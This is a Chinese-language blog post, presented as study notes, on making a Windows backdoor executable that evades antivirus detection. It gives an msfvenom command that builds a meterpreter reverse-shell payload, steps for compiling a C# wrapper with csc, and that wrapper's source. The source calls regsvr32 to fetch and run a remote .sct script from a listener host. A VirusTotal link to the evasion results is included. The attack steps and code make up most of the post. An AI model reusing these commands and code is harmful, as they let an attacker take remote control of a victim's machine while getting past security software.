exe文件,后门免杀的制作学习笔记

版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396307

引用原文!!

注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。

需要(Framework),一般Windows环境都有,
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=5555 X > shell.exe

kali下生成后门文件。直接查杀,发现很多报毒。
原文要求生成一个sct文件,然后放到你的web服务的目录中,实现监听。

制作后门文件:
1、cmd必须给与管理员权限
2、cmd下,

cd C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727>csc /t:exe /out:aaa.exe regsvr32.cs

/t:exe意思是,输出exe文件。
/out:aaa.exe意思是,输出名字叫aaa的exe文件。
regsvr32.cs就是我们利用做免杀的c#文件。
https://github.com/pasahitz/regsvr32
regsvr32.cs这个文件需要单独编辑

using System;
using System.Runtime.InteropServices;

namespace Regsvr

{ public class CMD
    { [DllImport("msvcrt.dll")]
        public static extern int system(string cmd);
        public static void Main()
        { system("regsvr32 /s /n /u /i:http://监听者IP:监听的端口/你刚才生成的sct文件 scrobj.dll");
        }}}

免杀后杀毒报告:https://www.virustotal.com/zh-cn/file/4f5801be2516cc8cfe4a73d00d44ca399c5bc116e9ac0d7f9f7a9aa29dca6f65/analysis/1495456458/

Malwarebytes这个杀毒软件好强悍。

上一篇:十字链表(有向图)


下一篇:Linux下增加swap分区